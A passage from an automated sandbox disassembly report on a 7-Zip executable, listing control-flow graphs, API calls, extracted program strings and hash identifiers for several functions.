2739->2741 2740->2741 2744 47a5e6-47a5f6 call 479af0 2741->2744 2745 47a5f8 2741->2745 2747 47a5fb-47a62f call 45b8f0 free * 3 call 4794a8 2744->2747 2745->2747 2747->2690
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressProc
                                              • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                              • API String ID: 190572456-3984264347
                                              • Opcode ID: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
                                              • Instruction ID: 4d33ccf4105851095a38eb635a4151429a5c2fa7ce19b5a36622003ccfab87f2
                                              • Opcode Fuzzy Hash: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
                                              • Instruction Fuzzy Hash: 55D16372319AC096C620EB22E8407DFA3A4F7C6B85F405527EA8E47B19DF7CC555CB0A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2752 4570c8-4570e4 call 457d4c 2754 4570e9-4570ec 2752->2754 2755 4570ee-4570f0 2754->2755 2756 4570f9-457103 call 459d84 2754->2756 2755->2756 2757 4570f2-4570f4 2755->2757 2761 457105-457107 2756->2761 2762 45710c-457136 call 459ed8 call 453274 call 45376c 2756->2762 2760 457449-457458 2757->2760 2761->2760 2769 457138-457141 2762->2769 2770 45715b-457175 call 453314 2762->2770 2769->2770 2771 457143-457145 2769->2771 2776 45717a-457186 call 45a170 2770->2776 2773 457147 2771->2773 2774 45714c-457155 2771->2774 2777 4573f1-4573fe free 2773->2777 2774->2770 2780 457188-457195 CreateDirectoryW 2776->2780 2781 4571aa-4571ac 2776->2781 2777->2760 2782 457360-457364 2780->2782 2783 45719b-4571a4 GetLastError 2780->2783 2784 4571b2-4571d2 call 453208 call 45a7ec 2781->2784 2785 45727d-457286 GetLastError 2781->2785 2786 457366-457379 call 459ab0 2782->2786 2787 4573c9-4573e1 free * 2 2782->2787 2783->2781 2783->2785 2808 457273-457278 free 2784->2808 2809 4571d8-4571e7 CreateDirectoryW 2784->2809 2789 4572e4-4572ed GetLastError 2785->2789 2790 457288-4572b5 call 457d28 call 453208 call 457ebc 2785->2790 2800 457381 2786->2800 2801 45737b-45737f 2786->2801 2787->2760 2792 4573e3-4573ee free 2789->2792 2793 4572f3-457301 call 45376c 2789->2793 2822 4572b7-4572c4 free 2790->2822 2823 4572c6-4572db free 2790->2823 2792->2777 2806 457307-457309 2793->2806 2807 457432-457447 free * 2 2793->2807 2805 457385-4573a3 call 453460 call 456c84 2800->2805 2801->2805 2835 4573a5-4573a9 2805->2835 2836 4573ad-4573c4 free * 2 2805->2836 2806->2807 2812 45730f-457316 2806->2812 2807->2760 2808->2785 2813 457356-45735b free 2809->2813 2814 4571ed-4571f6 GetLastError 2809->2814 2817 45732c-457332 2812->2817 2818 457318-45731c 2812->2818 2813->2782 2819 457207-457230 call 457d28 call 453208 call 457ebc 2814->2819 2820 4571f8-457202 free 2814->2820 2827 457419-457430 free * 2 2817->2827 2828 457338-45733c 2817->2828 2825 457400-457417 free * 2 2818->2825 2826 457322-457326 2818->2826 2841 457232-45724a free * 2 2819->2841 2842 45724f-457271 free * 2 2819->2842 2820->2789 2822->2789 2831 4572e0-4572e2 2823->2831 2825->2760 2826->2817 2826->2825 2827->2760 2828->2776 2833 457342-457351 2828->2833 2831->2782 2831->2789 2833->2776 2835->2786 2838 4573ab 2835->2838 2836->2760 2838->2787 2841->2789 2842->2831
                                              APIs
                                                • Part of subcall function 00457D4C: GetFileAttributesW.KERNELBASE ref: 00457D6E
                                                • Part of subcall function 00457D4C: GetFileAttributesW.KERNEL32 ref: 00457DA5
                                                • Part of subcall function 00457D4C: free.MSVCRT ref: 00457DB2
                                              • free.MSVCRT ref: 004573F6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AttributesFilefree
                                              • String ID:
                                              • API String ID: 1936811914-0
                                              • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                              • Instruction ID: 0f2543e4dd7666251c008696a452b02b763e3eb9243be35aebc0cdfbfad0b2f9
                                              • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                              • Instruction Fuzzy Hash: 8581432221894182CA20EF22F55126F6321FBC679AF441177FF8E87667DE2CC94DDB49

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2843 457ebc-457ee3 call 459b68 2846 457ee9-457f26 call 45339c call 459ce4 2843->2846 2847 457fca-457fd6 call 459ddc 2843->2847 2859 457f8c-457fa4 call 4591dc 2846->2859 2860 457f28-457f2c 2846->2860 2853 458253-45828a call 459d0c call 459b30 2847->2853 2854 457fdc-457fe4 2847->2854 2872 458306-45830b 2853->2872 2873 45828c-458294 2853->2873 2854->2853 2857 457fea-45800c call 453274 * 2 2854->2857 2876 45800e-458017 2857->2876 2877 45801b-458020 2857->2877 2870 457fa6 2859->2870 2871 457fa8-457fac 2859->2871 2860->2859 2863 457f2e-457f77 call 45abb0 2860->2863 2863->2859 2884 457f79-457f87 2863->2884 2878 457fb9-457fc5 call 4589d8 2870->2878 2879 457fb6 2871->2879 2880 457fae-457fb3 2871->2880 2881 45830d-458312 2872->2881 2882 458318-45831c 2872->2882 2873->2872 2883 458296-4582a5 call 457d4c 2873->2883 2876->2877 2885 458040-45804c call 453670 2877->2885 2886 458022-45803e call 452880 2877->2886 2892 458519-458524 2878->2892 2879->2878 2880->2879 2881->2882 2888 4584f2-458500 call 457978 2881->2888 2889 458377-458381 call 459c80 2882->2889 2890 45831e-458330 call 457d4c 2882->2890 2883->2888 2904 4582ab-4582b2 2883->2904 2884->2892 2901 458051-458062 call 459ce4 2885->2901 2886->2885 2886->2901 2905 458505-458506 2888->2905 2889->2888 2909 458387-458396 2889->2909 2890->2888 2908 458336-45833d 2890->2908 2919 458064-458067 2901->2919 2920 4580b1-4580bb call 457ebc 2901->2920 2904->2888 2910 4582b8-4582eb call 45339c 2904->2910 2906 458509-458511 call 45794c 2905->2906 2918 458516 2906->2918 2908->2888 2913 458343-458372 2908->2913 2909->2888 2914 45839c-4583a6 call 459ab0 2909->2914 2922 4582ed-4582f8 2910->2922 2923 4582fc-458301 2910->2923 2913->2906 2914->2888 2927 4583ac-4583c2 call 453274 2914->2927 2918->2892 2925 458075-4580a3 2919->2925 2926 458069-45806c 2919->2926 2931 4580c1-458108 call 453314 call 453208 call 457ce0 2920->2931 2933 45823e-45824e free * 2 2920->2933 2922->2923 2923->2906 2930 4580a5-4580af call 453404 2925->2930 2925->2931 2926->2920 2929 45806e-458073 2926->2929 2939 4583c4-4583ce call 452fec 2927->2939 2940 4583d2-4583f2 2927->2940 2929->2920 2929->2925 2930->2931 2953 45815a-458185 free * 2 call 45794c free 2931->2953 2954 45810a-458111 2931->2954 2933->2853 2939->2940 2944 4583f4-4583fe call 452fec 2940->2944 2945 458402-458437 call 457978 2940->2945 2944->2945 2955 458484-45849d call 457d4c 2945->2955 2956 458439-458457 wcscmp 2945->2956 2969 45822d-458239 free 2953->2969 2961 458113-458124 call 452748 2954->2961 2962 45818a-4581c1 SetLastError free * 2 call 45794c free 2954->2962 2970 4584b3-4584f0 call 45339c free 2955->2970 2971 45849f-4584a1 2955->2971 2957 45847c 2956->2957 2958 458459-458477 call 45339c free 2956->2958 2957->2955 2958->2906 2977 4581c3-4581ca 2961->2977 2978 45812a-458158 free call 453208 call 457ce0 2961->2978 2962->2969 2969->2892 2970->2906 2974 4584a7-4584b1 free 2971->2974 2975 4584a3-4584a5 2971->2975 2974->2888 2975->2970 2975->2974 2980 4581e0-45822a call 45362c free * 2 call 45794c free 2977->2980 2981 4581cc-4581d1 2977->2981 2978->2953 2978->2954 2980->2969 2981->2980 2984 4581d3-4581dc 2981->2984 2984->2980
                                              APIs
                                              • free.MSVCRT ref: 0045812F
                                              • free.MSVCRT ref: 0045816A
                                              • free.MSVCRT ref: 0045817F
                                              • free.MSVCRT ref: 00458232
                                                • Part of subcall function 0045ABB0: GetModuleHandleW.KERNEL32 ref: 0045ABD1
                                                • Part of subcall function 0045ABB0: GetProcAddress.KERNEL32 ref: 0045ABE1
                                                • Part of subcall function 0045ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0045AC32
                                              • SetLastError.KERNEL32 ref: 0045818F
                                              • free.MSVCRT ref: 0045819B
                                              • free.MSVCRT ref: 004581A6
                                              • free.MSVCRT ref: 004581BB
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00458243
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 0045824E
                                              • free.MSVCRT ref: 0045815F
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                              • String ID: :$:$DATA$\
                                              • API String ID: 4130059181-1004618218
                                              • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                              • Instruction ID: c80476292b9583963f3f75ff511c66cdac9321cf2cc9f57c436aeea9c5721a8f
                                              • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                              • Instruction Fuzzy Hash: FE02907320568096CB20DF26E59025EB760F796395F40422BEF8D47B66DF38D969CB08

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2991 493e84-493eb5 2992 4941e8 2991->2992 2993 493ebb 2991->2993 2994 4941ea-4941fd 2992->2994 2995 493ebe-493efa fputs call 492e24 2993->2995 2998 493efc-493f03 2995->2998 2999 493f51-493f59 2995->2999 3000 493f1f-493f4c call 453274 call 4930cc free 2998->3000 3001 493f05-493f1d fputs call 452300 2998->3001 3002 493f5b-493f62 2999->3002 3003 493f64-493f6f 2999->3003 3000->2999 3001->2999 3006 493f73-493f9e call 492e24 call 493148 3002->3006 3003->3006 3015 493fa0-493fce fputs * 2 call 452640 call 452300 3006->3015 3016 493fd3-493fe3 call 493034 3006->3016 3015->3016 3020 493fe8-493fea 3016->3020 3020->2994 3022 493ff0-493ff7 3020->3022 3023 493ff9-494027 fputs * 2 call 4526a0 call 452300 3022->3023 3024 49402c-49403c 3022->3024 3023->3024 3024->2994 3028 494042-494048 3024->3028 3030 49404a-494079 3028->3030 3031 4940af-4940b9 3028->3031 3036 4941b9 3030->3036 3037 49407f-494096 call 493034 3030->3037 3032 49419d-4941b1 3031->3032 3033 4940bf-4940e0 fputs 3031->3033 3032->2995 3035 4941b7 3032->3035 3033->3032 3041 4940e6-4940fc 3033->3041 3035->2992 3040 4941bd-4941ca SysFreeString 3036->3040 3044 4941bb 3037->3044 3045 49409c-4940ad SysFreeString 3037->3045 3040->2994 3041->3032 3043 494102-494133 3041->3043 3047 494139-494162 3043->3047 3048 4941cc 3043->3048 3044->3040 3045->3030 3045->3031 3051 4941ce-4941d8 call 45ae2c 3047->3051 3052 494164-494197 call 492ecc call 45ae2c SysFreeString 3047->3052 3049 4941d9-4941e6 SysFreeString 3048->3049 3049->2994 3051->3049 3052->3032 3052->3043
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$FreeString$fputcfree
                                              • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                              • API String ID: 2701146716-1919703766
                                              • Opcode ID: d0af8d30afaf3860d06d0172aa01809f7158207eed1de8f3100d6c3c0d1120ab
                                              • Instruction ID: 4d0622f7eaafd7582a42f521645e78869fe06219e632d09257340a9b33ebb338
                                              • Opcode Fuzzy Hash: d0af8d30afaf3860d06d0172aa01809f7158207eed1de8f3100d6c3c0d1120ab
                                              • Instruction Fuzzy Hash: A8914876214A8592DE10DF22E95476E7720F796BC9F005127EF5A87B28DF3CC94AC708

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3059 45f71c-45f74e call 451610 3062 45f774-45f7c2 _isatty * 3 3059->3062 3063 45f750-45f773 call 4702a0 _CxxThrowException 3059->3063 3065 45f7d4 3062->3065 3066 45f7c4-45f7c8 3062->3066 3063->3062 3067 45f7d9-45f81c 3065->3067 3066->3065 3069 45f7ca-45f7ce 3066->3069 3071 45f81e-45f822 3067->3071 3072 45f82a 3067->3072 3069->3065 3070 45f7d0-45f7d2 3069->3070 3070->3067 3071->3072 3073 45f824-45f828 3071->3073 3074 45f830-45f834 3072->3074 3073->3072 3073->3074 3075 45f836 3074->3075 3076 45f83c-45f846 3074->3076 3075->3076 3077 45f854-45f85e 3076->3077 3078 45f848-45f84e 3076->3078 3079 45f860-45f866 3077->3079 3080 45f86c-45f876 3077->3080 3078->3077 3079->3080 3081 45f884-45f88e 3080->3081 3082 45f878-45f87e 3080->3082 3083 45f890-45f89d 3081->3083 3084 45f8f3-45f8fd 3081->3084 3082->3081 3085 45f89f-45f8a9 3083->3085 3086 45f8ab-45f8be call 45ed34 3083->3086 3087 45f8ff-45f917 3084->3087 3088 45f91a-45f931 call 45ac74 * 2 3084->3088 3085->3084 3093 45f8e6-45f8ed 3086->3093 3094 45f8c0-45f8e5 call 4702a0 _CxxThrowException 3086->3094 3087->3088 3097 45f936-45f940 3088->3097 3093->3084 3094->3093 3099 45f946-45f95c 3097->3099 3100 45f9dd-45f9e7 3097->3100 3101 45f965-45f977 wcscmp 3099->3101 3102 45f95e-45f963 3099->3102 3103 45fa94-45fa9c 3100->3103 3104 45f9ed-45f9fa 3100->3104 3105 45f9bb-45f9c2 call 45ad0c 3101->3105 3106 45f979-45f98c call 45ed34 3101->3106 3102->3105 3104->3103 3107 45fa00-45fa1c call 452bc8 call 452d34 3104->3107 3105->3100 3117 45f9c4-45f9d7 call 49d4c0 call 45ac74 3105->3117 3114 45f9b4 3106->3114 3115 45f98e-45f9b3 call 4702a0 _CxxThrowException 3106->3115 3122 45fa4f-45fa74 call 4702a0 _CxxThrowException 3107->3122 3123 45fa1e-45fa3b call 453f78 3107->3123 3114->3105 3115->3114 3117->3100 3131 45fa75-45fa8f GetCurrentProcess SetProcessAffinityMask free 3122->3131 3132 45fa3d-45fa46 3123->3132 3133 45fa49-45fa4d 3123->3133 3131->3103 3132->3133 3133->3122 3133->3131
                                              APIs
                                                • Part of subcall function 00451610: free.MSVCRT(?,?,?,?,?,?,?,FFFFFFFF,?,?,0045F749), ref: 00451682
                                                • Part of subcall function 00451610: free.MSVCRT(?,?,?,?,?,?,?,FFFFFFFF,?,?,0045F749), ref: 0045168A
                                                • Part of subcall function 00451610: free.MSVCRT(?,?,?,?,?,?,?,FFFFFFFF,?,?,0045F749), ref: 004516C4
                                              • _CxxThrowException.MSVCRT ref: 0045F76E
                                              • _isatty.MSVCRT ref: 0045F77E
                                              • _isatty.MSVCRT ref: 0045F796
                                              • _isatty.MSVCRT ref: 0045F7AE
                                              • _CxxThrowException.MSVCRT ref: 0045F8E0
                                              • wcscmp.MSVCRT ref: 0045F96F
                                              • _CxxThrowException.MSVCRT ref: 0045F9AE
                                              • _CxxThrowException.MSVCRT ref: 0045FA6F
                                              • GetCurrentProcess.KERNEL32 ref: 0045FA77
                                              • SetProcessAffinityMask.KERNEL32 ref: 0045FA83
                                              • free.MSVCRT ref: 0045FA8F
                                              Strings
                                              • Unsupported switch postfix -stm, xrefs: 0045FA52
                                              • Unsupported switch postfix -bb, xrefs: 0045F8C3
                                              • Unsupported switch postfix for -slp, xrefs: 0045F991
                                              • SeRestorePrivilege, xrefs: 0045F91C
                                              • SeLockMemoryPrivilege, xrefs: 0045F9CB
                                              • SeCreateSymbolicLinkPrivilege, xrefs: 0045F92A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                              • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                              • API String ID: 1961088698-2328792591
                                              • Opcode ID: 9fbf6495933f589f3caaa937893ccbef6d2c554dfb66b53bc2ba33e20914ec5e
                                              • Instruction ID: 2cfcc03fbc8243de31c18f40d75e59a0e6912dccebfc56bda9e515d5912c28fd
                                              • Opcode Fuzzy Hash: 9fbf6495933f589f3caaa937893ccbef6d2c554dfb66b53bc2ba33e20914ec5e
                                              • Instruction Fuzzy Hash: A8A17EB3608AC499DB21DF25D4903AD3F20E396B88F58817BDB8C47726CB28C99DC715

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3134 49a448-49a455 3135 49a49c-49a4a4 3134->3135 3136 49a457-49a45f 3134->3136 3137 49a4f4 3135->3137 3138 49a4a6-49a4a9 3135->3138 3136->3135 3139 49a461-49a495 call 452300 fputs call 4526a0 call 452300 3136->3139 3142 49a4fc-49a50a 3137->3142 3140 49a4ab-49a4da call 452300 fputs call 4526a0 call 452300 3138->3140 3141 49a4df-49a4e5 3138->3141 3139->3135 3140->3141 3141->3142 3144 49a53d-49a559 free 3142->3144 3145 49a50c 3142->3145 3150 49a55b 3144->3150 3151 49a58c-49a5b5 free 3144->3151 3148 49a510-49a526 3145->3148 3153 49a538-49a53b 3148->3153 3154 49a528-49a533 free * 2 3148->3154 3156 49a55f-49a575 3150->3156 3162 49a5c5-49a5c8 3151->3162 3163 49a5b7-49a5be 3151->3163 3153->3144 3153->3148 3154->3153 3160 49a587-49a58a 3156->3160 3161 49a577-49a582 free * 2 3156->3161 3160->3151 3160->3156 3161->3160 3168 49a5ca-49a5e6 _CxxThrowException 3162->3168 3169 49a5e7-49a603 free 3162->3169 3163->3162 3166 49a5c0 3163->3166 3172 49a5c0 call 4966a8 3166->3172 3168->3169 3170 49a605 3169->3170 3171 49a626-49a637 free call 47a13c 3169->3171 3173 49a609-49a624 free 3170->3173 3175 49a63c-49a675 call 497080 call 45182c call 497f50 3171->3175 3172->3162 3173->3171 3173->3173 3182 49a6a8-49a6c9 free 3175->3182 3183 49a677 3175->3183 3185 49a67b-49a691 3183->3185 3186 49a6a3-49a6a6 3185->3186 3187 49a693-49a69e free * 2 3185->3187 3186->3182 3186->3185 3187->3186
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$fputs$ExceptionThrowfputc
                                              • String ID: Errors: $Warnings:
                                              • API String ID: 437615013-2345102087
                                              • Opcode ID: c75879e89a0d6b0eb1bb642928b78a50b68f1ecf96ffdd04da6d3d4d6d5326dc
                                              • Instruction ID: 3a8a9c069592bd4ecfccc102424df0d72dda62f1bc8a6ed9e725c91fb3ad39c6
                                              • Opcode Fuzzy Hash: c75879e89a0d6b0eb1bb642928b78a50b68f1ecf96ffdd04da6d3d4d6d5326dc
                                              • Instruction Fuzzy Hash: 9E51D4633559C181CD30EB26E9803AF6761F782795F444127DE9D07B19CF7CC89A8B4A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3188 4783c8-47841d call 456570 call 4531c0 call 458624 3195 478482 3188->3195 3196 47841f-47844c call 4531c0 call 4586dc 3188->3196 3198 478485-478489 3195->3198 3196->3195 3210 47844e-47847b call 4531c0 call 4586dc 3196->3210 3200 47848b-478498 free 3198->3200 3201 478499-47849d 3198->3201 3200->3201 3203 47849f-4784ac free 3201->3203 3204 4784ad-4784b1 3201->3204 3203->3204 3205 4784b3-4784b8 free 3204->3205 3206 4784bd-4784c0 3204->3206 3205->3206 3208 4784c6-4784ee call 453208 call 478290 3206->3208 3209 4785ef-478607 call 453314 free 3206->3209 3222 4784f0-478516 call 453314 free * 2 3208->3222 3223 47851b-478538 call 478290 3208->3223 3217 47860a-478611 3209->3217 3210->3195 3224 47847d-478480 3210->3224 3222->3217 3229 478565-47857b call 478290 3223->3229 3230 47853a-478560 call 453314 free * 2 3223->3230 3224->3198 3235 4785a5-4785bb call 478290 3229->3235 3236 47857d-4785a3 call 453314 free * 2 3229->3236 3230->3217 3241 4785e5-4785ea free 3235->3241 3242 4785bd-4785e3 call 453314 free * 2 3235->3242 3236->3217 3241->3209 3242->3217
                                              APIs
                                                • Part of subcall function 00458624: free.MSVCRT(?,?,?,?,?,?,0045FF0B), ref: 004586A9
                                              • free.MSVCRT ref: 00478493
                                              • free.MSVCRT ref: 004784A7
                                              • free.MSVCRT ref: 004784B8
                                              • free.MSVCRT ref: 00478503
                                              • free.MSVCRT ref: 0047850E
                                                • Part of subcall function 004586DC: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0047844A), ref: 00458761
                                              • free.MSVCRT ref: 0047854D
                                              • free.MSVCRT ref: 00478558
                                              • free.MSVCRT ref: 00478590
                                              • free.MSVCRT ref: 0047859B
                                                • Part of subcall function 00478290: free.MSVCRT(?,?,?,?,?,?,?,?,00000001,?,004784EC), ref: 0047832B
                                                • Part of subcall function 00478290: free.MSVCRT(?,?,?,?,?,?,?,?,00000001,?,004784EC), ref: 00478336
                                              • free.MSVCRT ref: 004785D0
                                              • free.MSVCRT ref: 004785DB
                                              • free.MSVCRT ref: 004785EA
                                              • free.MSVCRT ref: 00478602
                                                • Part of subcall function 00453314: memmove.MSVCRT ref: 00453339
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                              • API String ID: 1534225298-3804457719
                                              • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                              • Instruction ID: c92ff1d28ac78c9c885bc1ff4cd893a94396dd325d95e6259ba3fd3d6764a59c
                                              • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                              • Instruction Fuzzy Hash: 5351D57234590550CE20EF26E45539A6720E7C27E9F44511BBE5E4777ACF6CC68ACB0C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3245 47ab74-47aba4 3246 47aba6 3245->3246 3247 47abd3-47abf5 3245->3247 3248 47abaa-47abbc 3246->3248 3249 47ae31-47ae78 call 4783c8 call 4531c0 call 47a7fc free 3247->3249 3250 47abfb 3247->3250 3251 47abce-47abd1 3248->3251 3252 47abbe-47abc9 call 4794a8 free 3248->3252 3267 47ae7f-47ae87 3249->3267 3268 47ae7a 3249->3268 3253 47ac02-47acba call 453208 call 453518 call 453208 * 2 3250->3253 3251->3247 3251->3248 3252->3251 3277 47acc6-47accd 3253->3277 3278 47acbc-47acc1 call 453518 3253->3278 3272 47ae99-47aeca call 4531c0 call 47a9fc free 3267->3272 3273 47ae89-47ae94 call 45339c 3267->3273 3271 47af7a-47af99 free 3268->3271 3288 47aed1-47aeee call 4531c0 call 47a9fc 3272->3288 3289 47aecc 3272->3289 3273->3272 3281 47accf-47acd4 call 453518 3277->3281 3282 47acd9-47ad35 call 479d98 free * 2 3277->3282 3278->3277 3281->3282 3290 47ad37-47ad4c call 47a034 3282->3290 3291 47ad51-47ad61 call 452130 3282->3291 3301 47aef3-47af02 free 3288->3301 3289->3271 3302 47addd-47adf2 call 452130 3290->3302 3299 47ad63-47ad6a 3291->3299 3300 47ad6c 3291->3300 3304 47ad6f-47ad8b call 45b8f0 3299->3304 3300->3304 3305 47af06-47af10 3301->3305 3306 47af04 3301->3306 3311 47adf4-47ae01 call 479af0 3302->3311 3312 47ae03 3302->3312 3317 47adbd-47adc0 3304->3317 3318 47ad8d-47ad93 3304->3318 3309 47af12-47af16 3305->3309 3310 47af18-47af1b 3305->3310 3306->3271 3314 47af2a-47af2e 3309->3314 3310->3314 3315 47af1d-47af24 3310->3315 3319 47ae06-47ae2b call 45b8f0 call 4794a8 3311->3319 3312->3319 3321 47af77 3314->3321 3322 47af30-47af36 3314->3322 3315->3314 3320 47af26 3315->3320 3328 47adc2-47add3 memmove 3317->3328 3329 47adda 3317->3329 3324 47ad95-47ad9a free 3318->3324 3325 47ada1-47adac 3318->3325 3319->3249 3319->3253 3320->3314 3321->3271 3322->3321 3327 47af38 3322->3327 3324->3325 3330 47add5-47add8 3325->3330 3331 47adae-47adb9 call 452130 3325->3331 3333 47af3b-47af5a GetProcAddress 3327->3333 3328->3302 3329->3302 3330->3302 3331->3317 3336 47af66-47af6f 3333->3336 3337 47af5c-47af64 3333->3337 3336->3333 3340 47af71 3336->3340 3337->3336 3342 47af73-47af75 3337->3342 3340->3321 3342->3271
                                              APIs
                                              • free.MSVCRT ref: 0047ABC9
                                              • free.MSVCRT ref: 0047ACF3
                                              • free.MSVCRT ref: 0047ACFE
                                              • free.MSVCRT(?), ref: 0047AD95
                                              • memmove.MSVCRT(?), ref: 0047ADCB
                                              • free.MSVCRT(?), ref: 0047AE70
                                              • free.MSVCRT ref: 0047AF7F
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 004794DB
